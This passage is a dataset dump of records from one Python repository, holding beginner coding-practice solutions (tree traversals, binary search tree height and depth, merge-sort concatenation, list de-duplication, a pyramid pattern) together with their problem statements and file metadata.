k = k+1\r\n p2 = p2+1\r\n else:\r\n temp[k] = ar[p1]\r\n k = k+1\r\n p1 = p1+1\r\n \r\n while(p1<=mid):\r\n temp[k] = ar[p1]\r\n k = k+1\r\n p1 = p1+1\r\n \r\n while(p2<=h):\r\n temp[k] = ar[p2]\r\n k = k+1\r\n p2 = p2+1\r\n for i in range(l,h+1):\r\n ar[i] = temp[i-l]\r\n \r\n"
},
{
"alpha_fraction": 0.49300700426101685,
"alphanum_fraction": 0.5384615659713745,
"avg_line_length": 14.342857360839844,
"blob_id": "f6aaf63f547ca2974f9adf7b01205da5a50b5439",
"content_id": "965a69b2f37d7c944e195fac012a017b53bfdae0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 572,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 35,
"path": "/Reverse integer.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nReverse integer\r\nAsked in: \r\nHCL\r\nBloomberg\r\nReverse digits of an integer.\r\n\r\nExample1:\r\n\r\nx = 123,\r\n\r\nreturn 321\r\nExample2:\r\n\r\nx = -123,\r\n\r\nreturn -321\r\n\r\nReturn 0 if the result overflows and does not fit in a 32 bit signed integer\r\n\r\n\"\"\"\r\n\r\n\r\nclass Solution:\r\n # @param A : integer\r\n # @return an integer\r\n def reverse(self, A):\r\n sgn = -1 if A < 0 else 1\r\n A = abs(A)\r\n string = str(A)\r\n reverse = string[::-1]\r\n result = int(reverse)\r\n if result > 2**31 - 1:\r\n return 0\r\n return sgn * result\r\n"
},
{
"alpha_fraction": 0.4859693944454193,
"alphanum_fraction": 0.5059523582458496,
"avg_line_length": 20.380952835083008,
"blob_id": "2ee4906c78b7ca18f12c4e71d5a7f09a7f442f44",
"content_id": "74f4d59dc3d92e869b9590e1564c2c40af2c15c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2352,
"license_type": "no_license",
"max_line_length": 213,
"num_lines": 105,
"path": "/Height of Tree.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\n\r\n\r\nHeight of Tree\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nGiven an array of unique elements, construct a Binary Search Tree and find the height of the tree.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases. Its followed by 2T lines. First line of each test case contains N - number of nodes in the BST. The next line contains N unique integers - value of the nodes.\r\n\r\nConstraints\r\n\r\n1 <= T <= 1000\r\n1 <= N <= 1000\r\n0 <= ar[i] <= 10000\r\n\r\nOutput Format\r\n\r\nFor each test case, print the height of the Binary Search Tree, separated by newline.\r\n\r\nSample Input 0\r\n\r\n3\r\n5\r\n1 2 3 4 5 \r\n5\r\n3 2 4 1 5 \r\n7\r\n4 5 15 0 1 7 17 \r\n\r\nSample Output 0\r\n\r\n4\r\n2\r\n3\r\n\r\n\r\n\"\"\"\r\n\r\n\r\nclass Node:\r\n def __init__(self, info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n self.level = None \r\n\r\n def __str__(self):\r\n return str(self.info) \r\n\r\nclass BinarySearchTree:\r\n def __init__(self): \r\n self.root = None\r\n\r\n def create(self, val): \r\n if self.root == None:\r\n self.root = Node(val)\r\n else:\r\n current = self.root\r\n \r\n while True:\r\n if val < current.info:\r\n if current.left:\r\n current = current.left\r\n else:\r\n current.left = Node(val)\r\n break\r\n elif val > current.info:\r\n if current.right:\r\n current = current.right\r\n else:\r\n current.right = Node(val)\r\n break\r\n else:\r\n break\r\n\r\n# Enter your code here. Read input from STDIN. Print output to STDOUT\r\n'''\r\nclass Node:\r\n def __init__(self,info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n \r\n\r\n // this is a node of the tree , which contains info as data, left , right\r\n'''\r\ndef height(root):\r\n if(root == None):\r\n return -1\r\n return max(height(root.left), height(root.right))+1\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n l = list(map(int, input().split()))\r\n tree = BinarySearchTree()\r\n for i in l:\r\n tree.create(i)\r\n print(height(tree.root))\r\n\r\n"
},
{
"alpha_fraction": 0.498151570558548,
"alphanum_fraction": 0.5134010910987854,
"avg_line_length": 19.8383846282959,
"blob_id": "526768d9959c3f96c30059ee7d0819424d8e7684",
"content_id": "647fa8e55ff9b7b943c9a498ab93aa8c73b7f083",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2164,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 99,
"path": "/Tree Preorder Traversal.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTree: Preorder Traversal\r\n1252.43 more points to get your next star!\r\nRank: 108726|Points: 947.57/2200\r\nProblem Solving\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n Editorial\r\n\r\nComplete the preOrder function in your editor below, which has\r\n\r\nparameter: a pointer to the root of a binary tree. It must print the values in the tree's preorder traversal as a single line of space-separated values.\r\n\r\nInput Format\r\n\r\nOur hidden tester code passes the root node of a binary tree to your preOrder function.\r\n\r\nConstraints\r\n\r\nNodes in the tree\r\n\r\nOutput Format\r\n\r\nPrint the tree's preorder traversal as a single line of space-separated values.\r\n\r\nSample Input\r\n\r\n 1\r\n \\\r\n 2\r\n \\\r\n 5\r\n / \\\r\n 3 6\r\n \\\r\n 4 \r\n\r\nSample Output\r\n\r\n1 2 5 3 4 6 \r\n\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n\r\nclass Node:\r\n def __init__(self, info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n self.level = None \r\n\r\n def __str__(self):\r\n return str(self.info) \r\n\r\nclass BinarySearchTree:\r\n def __init__(self): \r\n self.root = None\r\n\r\n def create(self, val): \r\n if self.root == None:\r\n self.root = Node(val)\r\n else:\r\n current = self.root\r\n \r\n while True:\r\n if val < current.info:\r\n if current.left:\r\n current = current.left\r\n else:\r\n current.left = Node(val)\r\n break\r\n elif val > current.info:\r\n if current.right:\r\n current = current.right\r\n else:\r\n current.right = Node(val)\r\n break\r\n else:\r\n break\r\n\r\n\"\"\"\r\nNode is defined as\r\nself.left (the left child of the node)\r\nself.right (the right child of the node)\r\nself.info (the value of the node)\r\n\"\"\"\r\ndef preOrder(root):\r\n #Write your code here\r\n if(root == None):\r\n return \r\n print(root.info, end=\" \")\r\n preOrder(root.left)\r\n preOrder(root.right)\r\n\r\n"
},
{
"alpha_fraction": 0.45538127422332764,
"alphanum_fraction": 0.5197404026985168,
"avg_line_length": 18.544445037841797,
"blob_id": "7c8dbf1a50421acfa7b1a2cf88cd80550f776ad8",
"content_id": "a0f14be5749877677c14d2edc3081d5fca9c75d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1849,
"license_type": "no_license",
"max_line_length": 205,
"num_lines": 90,
"path": "/Largest Concatenated Number.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nLargest Concatenated Number\r\nProblem\r\nSubmissions\r\nLeaderboard\r\nDiscussions\r\nGiven an array of integers, find the largest number that can be constructed by concatenating all the elements of the given array.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases. Its followed by 2T lines. First line of each test case contains N - size of the array and the second line contains N integers - elements of the array.\r\n\r\nConstraints\r\n\r\n1 <= T <= 1000\r\n1 <= N <= 1000\r\n0 <= ar[i] <= 1000\r\n\r\nOutput Format\r\n\r\nFor each test case, print the largest number that can be constructed by concatenating all the elements of the given array, separated by newline.\r\n\r\nSample Input 0\r\n\r\n3\r\n8\r\n49 73 58 30 72 44 78 23 \r\n4\r\n69 9 57 60 \r\n2\r\n40 4 \r\nSample Output 0\r\n\r\n7873725849443023\r\n9696057\r\n440\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n\r\ndef merges(ar,l,h):\r\n if(l==h):\r\n return\r\n mid=(l+h)//2\r\n merges(ar,l,mid)\r\n merges(ar,mid+1,h)\r\n merge(ar,l,mid,h)\r\n \r\ndef merge(ar,l,mid,h):\r\n p1 = l\r\n p2 = mid+1\r\n k = 0\r\n size = h-l+1\r\n temp = [0]*size\r\n while((p1<=mid) and (p2<=h)):\r\n s1 = str(ar[p1])+str(ar[p2])\r\n s2 = str(ar[p2])+str(ar[p1])\r\n if(int(s2)>int(s1)):\r\n temp[k] = ar[p2]\r\n k = k+1\r\n p2 = p2+1\r\n else:\r\n temp[k] = ar[p1]\r\n k = k+1\r\n p1 = p1+1\r\n \r\n while(p1<=mid):\r\n temp[k] = ar[p1]\r\n k = k+1\r\n p1 = p1+1\r\n \r\n while(p2<=h):\r\n temp[k] = ar[p2]\r\n k = k+1\r\n p2 = p2+1\r\n for i in range(l,h+1):\r\n ar[i] = temp[i-l]\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n A = list(map(int, input().split()))\r\n merges(A, 0 ,n-1)\r\n s = ''\r\n for i in A:\r\n s += str(i)\r\n if(int(s)==0):\r\n print(0)\r\n else:\r\n print(str(s))\r\n"
},
{
"alpha_fraction": 0.6191037893295288,
"alphanum_fraction": 0.6308962106704712,
"avg_line_length": 16.844444274902344,
"blob_id": "f35f6d8f619cff744a45c3c852bf0e4a47a5bcb5",
"content_id": "e1b059844433ac47850321562fa49fa17424a6f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1696,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 90,
"path": "/leftrotation.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nA left rotation operation on an array shifts each of the array's elements unit to the left. For example, if left rotations are performed on array , then the array would become\r\n\r\n.\r\n\r\nGiven an array\r\nof integers and a number, , perform\r\n\r\nleft rotations on the array. Return the updated array to be printed as a single line of space-separated integers.\r\n\r\nFunction Description\r\n\r\nComplete the function rotLeft in the editor below. It should return the resulting array of integers.\r\n\r\nrotLeft has the following parameter(s):\r\n\r\n An array of integers \r\n\r\n.\r\nAn integer\r\n\r\n , the number of rotations.\r\n\r\nInput Format\r\n\r\nThe first line contains two space-separated integers\r\nand , the size of and the number of left rotations you must perform.\r\nThe second line contains space-separated integers\r\n\r\n.\r\n\r\nConstraints\r\n\r\nOutput Format\r\n\r\nPrint a single line of\r\nspace-separated integers denoting the final state of the array after performing\r\n\r\nleft rotations.\r\n\r\nSample Input\r\n\r\n5 4\r\n1 2 3 4 5\r\n\r\nSample Output\r\n\r\n5 1 2 3 4\r\n\r\n\r\n\"\"\"\r\n\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the rotLeft function below.\r\ndef rotLeft(a, d):\r\n k = 0\r\n d = d % len(a)\r\n temp = [0]*len(a)\r\n for i in a[d:]:\r\n temp[k] = i\r\n k += 1\r\n for i in a[0:d]:\r\n temp[k] = i\r\n k += 1 \r\n return temp\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n nd = input().split()\r\n\r\n n = int(nd[0])\r\n\r\n d = int(nd[1])\r\n\r\n a = list(map(int, input().rstrip().split()))\r\n\r\n result = rotLeft(a, d)\r\n\r\n fptr.write(' '.join(map(str, result)))\r\n fptr.write('\\n')\r\n\r\n fptr.close()\r\n"
},
{
"alpha_fraction": 0.5251655578613281,
"alphanum_fraction": 0.6033112406730652,
"avg_line_length": 17.789474487304688,
"blob_id": "6d157680dbaad81522c97dfdd7370c1e3755747b",
"content_id": "cb728d036ff477566464b2052d215456b8b85487",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1510,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 76,
"path": "/PreOrder InOrder to PostOrder.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nPreOrder InOrder to PostOrder\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nGiven the preorder and inorder traversals of a binary\r\ntree with unique elements, print the PostOrder Traversals of the tree.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases.\r\nIts followed by 3T lines. First line of each test case contains N - number\r\nof nodes in the BST. Second line contains N unique integers denoting\r\nthe preorder traversal of the tree. Third line contains N unique integers\r\ndenoting the inorder traversal of the tree.\r\n\r\nConstraints\r\n\r\n1 <= T <= 1000\r\n1 <= N <= 1000\r\n0 <= ar[i] <= 10000\r\n\r\nOutput Format\r\n\r\nFor each test case, print the PostOrder Traversal of the Binary Tree,\r\nseparated by newline.\r\n\r\nSample Input 0\r\n\r\n3\r\n7\r\n1 2 4 5 3 6 7 \r\n4 2 5 1 6 3 7 \r\n10\r\n8 5 9 7 1 12 2 4 11 3 \r\n9 5 1 7 2 12 8 4 3 11 \r\n9\r\n2 7 3 6 8 11 5 9 4 \r\n3 7 8 6 11 2 5 4 9 \r\n\r\nSample Output 0\r\n\r\n4 5 2 6 7 3 1 \r\n9 1 2 12 7 5 3 11 4 8 \r\n3 8 11 6 7 4 9 5 2 \r\n\r\n\r\n\"\"\"\r\ndef postorder(pre, ino):\r\n\r\n n = len(pre)\r\n if(n == 0):\r\n return \r\n #print(*pre)\r\n #print(*ino)\r\n root = pre[0]\r\n #print(root)\r\n pos = ino.index(root)\r\n #print(pos)\r\n postorder(pre[1:pos+1], ino[:pos])\r\n postorder(pre[pos+1:], ino[pos+1:n])\r\n print(pre[0], end =\" \")\r\n \r\n \r\n\r\n\r\nfor _ in range (int(input())):\r\n n = int(input())\r\n pre = list(map(int, input().split()))\r\n ino = list(map(int, input().split()))\r\n postorder(pre, ino)\r\n print()\r\n \r\n"
},
{
"alpha_fraction": 0.5234693884849548,
"alphanum_fraction": 0.5306122303009033,
"avg_line_length": 18.851064682006836,
"blob_id": "d492e2e23ef2f9c45e10b345f301a608c98786c6",
"content_id": "552d10e6803d16f8e7383908746219b30a9df323",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 980,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 47,
"path": "/Min Depth of Binary Tree.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nMin Depth of Binary Tree\r\n\r\n Asked in: \r\n Facebook\r\n Amazon\r\n\r\nGiven a binary tree, find its minimum depth.\r\n\r\nThe minimum depth is the number of nodes along the shortest path from the root node down to the nearest leaf node.\r\n\r\n NOTE : The path has to end on a leaf node. \r\n\r\nExample :\r\n\r\n 1\r\n /\r\n 2\r\n\r\nmin depth = 2.\r\n\r\n\r\n\"\"\"\r\n\r\n #Definition for a binary tree node\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution:\r\n # @param A : root node of tree\r\n # @return an integer\r\n def minDepth(self, A):\r\n if not A.left and not A.right:\r\n return 1\r\n \r\n if A.right and A.left:\r\n return min( self.minDepth(A.left), self.minDepth(A.right) ) + 1\r\n \r\n if A.left:\r\n return self.minDepth(A.left) + 1\r\n \r\n if A.right:\r\n return self.minDepth(A.right) + 1\r\n"
},
{
"alpha_fraction": 0.6409266591072083,
"alphanum_fraction": 0.6743886470794678,
"avg_line_length": 27.576923370361328,
"blob_id": "e32de4661279b1df596977f9ededcbbfa2ef5354",
"content_id": "7a702d806cb10e96975bcba691e7be69994f2411",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1554,
"license_type": "no_license",
"max_line_length": 296,
"num_lines": 52,
"path": "/Sums in a Triangle (DP).py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"Sums in a Triangle Problem Code: SUMTRIAN\r\nAdd problem to Todo list\r\nSubmit\r\n\r\n \r\nLet's consider a triangle of numbers in which a number appears in the first line, two numbers appear in the second line, three in the third line, etc. Develop a program which will compute the largest of the sums of numbers that appear on the paths starting from the top towards the base, so that:\r\n\r\non each path the next number is located on the row below, more precisely either directly below or below and one place to the right;\r\nthe number of rows is strictly positive, but less than 100\r\nall numbers are positive integers between 0 and 99.\r\nInput\r\nIn the first line integer n - the number of test cases (equal to about 1000). Then n test cases follow. Each test case starts with the number of lines which is followed by their content.\r\n\r\nOutput\r\nFor each test case write the determined value in a separate line.\r\n\r\nExample\r\nInput:\r\n2\r\n3\r\n1\r\n2 1\r\n1 2 3\r\n4 \r\n1 \r\n1 2 \r\n4 1 2\r\n2 3 1 1 \r\n\r\nOutput:\r\n5\r\n9\r\n\r\nWarning: large Input/Output data, be careful with certain languages\r\nAll submissions for this problem are available.\r\nAuthor:\tadmin\r\nTags:\tadmin\r\nDate Added:\t1-12-2008\r\nTime Limit:\t3 secs\r\nSource Limit:\t5000 Bytes\r\n\"\"\"\r\n\r\n# cook your dish here\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n t = [] #triangle \r\n for j in range(n):\r\n t.append(list(map(int, input().split())))\r\n for j in range(n-1, -1, -1):\r\n for k in range(0,j):\r\n t[j-1][k] = t[j-1][k] + max(t[j][k],t[j][k+1])\r\n print(t[0][0])\r\n \r\n \r\n"
},
{
"alpha_fraction": 0.44040828943252563,
"alphanum_fraction": 0.45962172746658325,
"avg_line_length": 18.054216384887695,
"blob_id": "56a27202d80275979d3130854acbf28a5310df87",
"content_id": "5c3aacb7de0200ed1bbaf9f3c001414c23ae5bf5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3332,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 166,
"path": "/Right View of Tree.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nRight View of Tree\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nGiven an array of unique elements, construct a Binary Search Tree\r\nand print the right-view of the tree. Right view of a Tree is the set\r\nof nodes visible when tree is viewed from right side.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases. Its followed\r\nby 2T lines. First line of each test case contains N - number of nodes\r\nin the BST. The next line contains N unique integers - value of the nodes.\r\n\r\nConstraints\r\n\r\n1 <= T <= 1000\r\n1 <= N <= 1000\r\n0 <= ar[i] <= 10000\r\n\r\nOutput Format\r\n\r\nFor each test case, print the right-view of the Binary Search Tree,\r\nseparated by newline.\r\n\r\nSample Input 0\r\n\r\n3\r\n5\r\n1 2 3 4 5 \r\n5\r\n3 2 4 1 5 \r\n7\r\n4 5 15 0 1 7 17 \r\n\r\nSample Output 0\r\n\r\n1 2 3 4 5 \r\n3 4 5 \r\n4 5 15 17 \r\n\r\n\r\n\r\n\r\n\"\"\"\r\n\r\nclass Node:\r\n def __init__(self, info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n self.level = None \r\n\r\n def __str__(self):\r\n return str(self.info) \r\n\r\nclass BinarySearchTree:\r\n def __init__(self): \r\n self.root = None\r\n\r\n def create(self, val): \r\n if (self.root == None):\r\n self.root = Node(val)\r\n else:\r\n current = self.root\r\n \r\n while True:\r\n if val < current.info:\r\n if current.left:\r\n current = current.left\r\n else:\r\n current.left = Node(val)\r\n break\r\n elif val > current.info:\r\n if current.right:\r\n current = current.right\r\n else:\r\n current.right = Node(val)\r\n break\r\n else:\r\n break\r\ndef levelor(root):\r\n if root is None: \r\n return\r\n q = [] \r\n q.append(root)\r\n \r\n while(len(q)>0):\r\n k=len(q)\r\n temp=[]\r\n for i in range(0,k):\r\n x = q.pop(0)\r\n temp.append(x)\r\n if(x.left != None):\r\n q.append(x.left)\r\n if(x.right != None):\r\n q.append(x.right)\r\n print(temp[-1].info,end=\" \")\r\n # print()\r\n\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n tree = BinarySearchTree()\r\n ar = list(map(int, input().split()))\r\n for i in ar:\r\n tree.create(i)\r\n levelor(tree.root)\r\n print()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\"\"\"ÏNTERVIEW BIT \"\"\"\r\n\r\n\r\n\r\n # Definition for a binary tree node\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution:\r\n # @param A : root node of tree\r\n # @return a list of integers\r\n def solve(self, root):\r\n if root is None: \r\n return\r\n q = [] \r\n q.append(root)\r\n l = []\r\n while(len(q)>0):\r\n k=len(q)\r\n temp=[]\r\n for i in range(0,k):\r\n x = q.pop(0)\r\n temp.append(x.val)\r\n if(x.left != None):\r\n q.append(x.left)\r\n if(x.right != None):\r\n q.append(x.right)\r\n l.append(temp[-1])\r\n return l\r\n # print()\r\n\r\n"
},
{
"alpha_fraction": 0.5104895234107971,
"alphanum_fraction": 0.5325443744659424,
"avg_line_length": 14.899999618530273,
"blob_id": "20c39b5e32b2ef310e224cb7742f029c0f4c07dd",
"content_id": "418c37397f6eae0111e05554c7677268a921f000",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1859,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 110,
"path": "/Path to Given Node.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\"\r\nPath to Given Node\r\nAsked in: \r\nAmazon\r\nProblem Description\r\n\r\nGiven a Binary Tree A containing N nodes.\r\n\r\nYou need to find the path from Root to a given node B.\r\n\r\nNOTE:\r\n\r\nNo two nodes in the tree have same data values.\r\nYou can assume that B is present in the tree A and a path always exists.\r\n\r\n\r\nProblem Constraints\r\n1 <= N <= 105\r\n\r\n1 <= Data Values of Each Node <= N\r\n\r\n1 <= B <= N\r\n\r\n\r\n\r\nInput Format\r\nFirst Argument represents pointer to the root of binary tree A.\r\n\r\nSecond Argument is an integer B denoting the node number.\r\n\r\n\r\n\r\nOutput Format\r\nReturn an one-dimensional array denoting\r\nthe path from Root to the node B in order.\r\n\r\n\r\n\r\nExample Input\r\nInput 1:\r\n\r\n A =\r\n\r\n 1\r\n / \\\r\n 2 3\r\n / \\ / \\\r\n 4 5 6 7 \r\n\r\n\r\nB = 5\r\n\r\nInput 2:\r\n\r\n A = \r\n 1\r\n / \\\r\n 2 3\r\n / \\ . \\\r\n 4 5 . 6\r\n\r\n\r\nB = 1\r\n\r\n\r\n\r\n\r\nExample Output\r\nOutput 1:\r\n\r\n [1, 2, 5]\r\nOutput 2:\r\n\r\n [1]\r\n\r\n\r\nExample Explanation\r\nExplanation 1:\r\n\r\n We need to find the path from root node to node with data value 5.\r\n So the path is 1 -> 2 -> 5 so we will return [1, 2, 5]\r\nExplanation 2:\r\n\r\n We need to find the path from root node to node with data value 1.\r\n As node with data value 1 is the root so there is only one node in the path.\r\n So we will return [1]\r\n\r\n\r\n\r\n\r\n\"\"\"\"\r\n\r\n\r\nclass Solution:\r\n # @param A : root node of tree\r\n # @param B : integer\r\n # @return a list of integers\r\n def solve(self, A, B):\r\n ans=[]\r\n def rh(root,lis,B):\r\n if(root==None):\r\n return []\r\n if(root.val==B):\r\n lis.append(root.val)\r\n for i in lis:\r\n ans.append(i)\r\n rh(root.left,lis+[root.val],B)\r\n rh(root.right,lis+[root.val],B)\r\n rh(A,[],B)\r\n return ans\r\n"
},
{
"alpha_fraction": 0.47585228085517883,
"alphanum_fraction": 0.4978693127632141,
"avg_line_length": 21.495798110961914,
"blob_id": "929b0111d47094332130858bd5d34ea767c22464",
"content_id": "e6416a4a9501345e7f3992dff0b44028ebe1b682",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2816,
"license_type": "no_license",
"max_line_length": 213,
"num_lines": 119,
"path": "/Depth of Tree Nodes.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nDepth of Tree Nodes\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nGiven an array of unique elements, construct a Binary Search Tree and for every node, print the depth of that node.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases. Its followed by 2T lines. First line of each test case contains N - number of nodes in the BST. The next line contains N unique integers - value of the nodes.\r\n\r\nConstraints\r\n\r\nFor each test case, print the depth of every node of the Binary Search Tree, separated by newline.\r\n\r\n1 <= T <= 1000\r\n1 <= N <= 1000\r\n0 <= ar[i] <= 10000\r\n\r\nOutput Format\r\n\r\nFor each test case, print N integers, where the ith integer denotes the depth of A[i] in the Binary Search Tree, separated by newline.\r\n\r\nSample Input 0\r\n\r\n3\r\n5\r\n1 2 3 4 5 \r\n5\r\n3 2 4 1 5 \r\n7\r\n4 5 15 0 1 7 17 \r\n\r\nSample Output 0\r\n\r\n0 1 2 3 4 \r\n0 1 1 2 2 \r\n0 1 2 1 2 3 3 \r\n\r\n\r\n\"\"\"\r\n\r\nclass Node:\r\n def __init__(self, info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n self.level = None \r\n\r\n def __str__(self):\r\n return str(self.info) \r\n\r\nclass BinarySearchTree:\r\n def __init__(self): \r\n self.root = None\r\n\r\n def create(self, val): \r\n if self.root == None:\r\n self.root = Node(val)\r\n else:\r\n current = self.root\r\n \r\n while True:\r\n if val < current.info:\r\n if current.left:\r\n current = current.left\r\n else:\r\n current.left = Node(val)\r\n break\r\n elif val > current.info:\r\n if current.right:\r\n current = current.right\r\n else:\r\n current.right = Node(val)\r\n break\r\n else:\r\n break\r\n\r\n# Enter your code here. Read input from STDIN. Print output to STDOUT\r\n'''\r\nclass Node:\r\n def __init__(self,info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n \r\n\r\n // this is a node of the tree , which contains info as data, left , right\r\n \r\n'''\r\ndef search(r, key, v):\r\n t = r \r\n if(t == None):\r\n return v\r\n if(t.info == key):\r\n return v\r\n if(t.info > key):\r\n v = v + 1\r\n return search(t.left, key, v)\r\n else:\r\n v = v + 1\r\n return search(t.right, key, v)\r\n \r\n\r\n \r\nfor _ in range(int(input())):\r\n n = int(input())\r\n l = list(map(int, input().split()))\r\n tree = BinarySearchTree()\r\n for i in l:\r\n tree.create(i)\r\n for i in range(n):\r\n d = search(tree.root, l[i], 0)\r\n print(d, end = \" \")\r\n print()\r\n \r\n \r\n"
},
{
"alpha_fraction": 0.5062034726142883,
"alphanum_fraction": 0.522332489490509,
"avg_line_length": 19.13157844543457,
"blob_id": "41ae9d7a555fb175b2924a0128adca62f649ecf2",
"content_id": "ee73f8fc3014519dbadf25e9b5ff507bdc0c40cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 806,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 38,
"path": "/Remove Duplicates from Sorted List.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nRemove Duplicates from Sorted List\r\n\r\n Asked in: \r\n Microsoft\r\n VMWare\r\n\r\nGiven a sorted linked list, delete all duplicates such that each element appear only once.\r\n\r\nFor example,\r\nGiven 1->1->2, return 1->2.\r\nGiven 1->1->2->3->3, return 1->2->3.\r\n\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @return the head node in the linked list\r\n def deleteDuplicates(self, A):\r\n if(A == None):\r\n return A\r\n temp = A\r\n while(A.next != None):\r\n if(A.next.val == A.val):\r\n A.next = A.next.next\r\n else:\r\n A = A.next\r\n return temp\r\n \r\n"
},
{
"alpha_fraction": 0.5526315569877625,
"alphanum_fraction": 0.5714285969734192,
"avg_line_length": 10.97560977935791,
"blob_id": "666657e60207a8ed7a4eaa16470a983bf270179e",
"content_id": "8ae81801bec3b336b6f7953a847229e5b836225a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 532,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 41,
"path": "/Print pyramid pattern.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nPrint pyramid pattern\r\nProblem\r\nSubmissions\r\nLeaderboard\r\nDiscussions\r\nPrint pyramid pattern. See example for more details.\r\n\r\nInput Format\r\n\r\nFirst line of input contains a single integer N - the size of the pyramid.\r\n\r\nConstraints\r\n\r\n1 <= N <= 50\r\n\r\nOutput Format\r\n\r\nFor the given integer, print pyramid pattern.\r\n\r\nSample Input 0\r\n\r\n5\r\nSample Output 0\r\n\r\n *\r\n ***\r\n *****\r\n *******\r\n*********\r\n\r\n\"\"\"\r\n\r\n\r\nn = int(input())\r\nl = n-1\r\ni = 1\r\nfor j in range(n):\r\n print(\" \"*l,\"*\"*i,\" \"*l,sep=\"\")\r\n l=l-1\r\n i=i+2\r\n"
},
{
"alpha_fraction": 0.49738219380378723,
"alphanum_fraction": 0.5122163891792297,
"avg_line_length": 21.54166603088379,
"blob_id": "916e2bb4c0a65a983b367c6ba2b54729a3b10cf1",
"content_id": "e69871abea90641ed8347084773f56f382d5cd2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1146,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 48,
